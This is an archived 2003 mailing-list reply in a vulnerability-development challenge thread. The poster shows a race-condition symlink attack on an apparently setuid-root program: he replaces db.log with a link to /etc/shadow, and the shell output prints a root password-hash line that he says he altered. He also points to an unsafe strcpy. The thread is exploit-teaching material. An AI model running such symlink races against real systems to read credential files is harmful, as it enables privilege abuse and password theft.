Re: [Vuln-dev Challenge] Challenge #2

From: Thomas Cannon (tcannonat_private)
Date: Fri May 23 2003 - 16:48:08 PDT

Next message: Steven Hill: "[Vuln-dev Challenge]: Symlink Attack"

Previous message: Joel Eriksson: "Re: Frame Pointer Overwriting"
In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
Next in thread: Jason_Royes: "Re: [Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> 
>         /* read log */
>         if ( (f1 = fopen("db.log", "r")) == NULL)
>                 return 1;
>         if (fgets(bfp, BFSIZE, f1) == NULL)
>                 return 1;
> 

...and if db.log is perhaps a symlink to /etc/shadow?

I assumed the program would be chown'd to root, and set 4755. If this is an
invalid assumption, well, no point in reading any further.

I compiled the program, stopped it after it writing the input log, made a
symlink, and resumed running the program, with lovely results:

[tcannon@needle]$ rm db.log
[tcannon@needle]$ ln -s /etc/shadow db.log
[tcannon@needle]$ fg
./a.out a a
root:$1$TlFzTwuXXX.yj55Gy2RVfUd8dSDAE/:11955:0:99999:7:::

I like race conditions. No point in wasting your CPU -- that shadowed
password did get modified before I sent it to the list :-)

Cheers,

--tcannon

PS: Nice strcpy

Next message: Steven Hill: "[Vuln-dev Challenge]: Symlink Attack"
Previous message: Joel Eriksson: "Re: Frame Pointer Overwriting"
In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
Next in thread: Jason_Royes: "Re: [Vuln-dev Challenge] Challenge #2"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat May 24 2003 - 10:39:30 PDT